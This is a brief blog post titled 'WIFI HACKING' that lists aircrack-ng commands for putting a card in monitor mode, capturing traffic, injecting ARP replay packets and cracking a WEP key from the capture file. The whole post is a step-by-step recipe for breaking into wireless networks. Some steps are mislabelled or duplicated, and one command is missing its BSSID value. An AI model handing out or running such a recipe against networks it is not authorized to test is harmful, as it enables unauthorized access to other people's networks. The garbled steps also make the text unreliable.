WIFI HACKING

to check the name of wireless card:
iwconfig

to put the wireless card in monitor mode:
airmon-ng start wifi0

to check the available connections:
airodump-ng ath1

to collect data packets in a file:
airodump-ng -c 11 --bssid -w crack ath1

to check the association with router:
aireplay-ng -3 -b bssid -e kyrion ath1

to ping the router again and again:
aireplay-ng -3 -b bssid -e kyrion ath1

to retrieve the password from data file:
aircrack-ng -n 64 --bssid bssid crack-01.cap

Post a Comment

Previous Post Next Post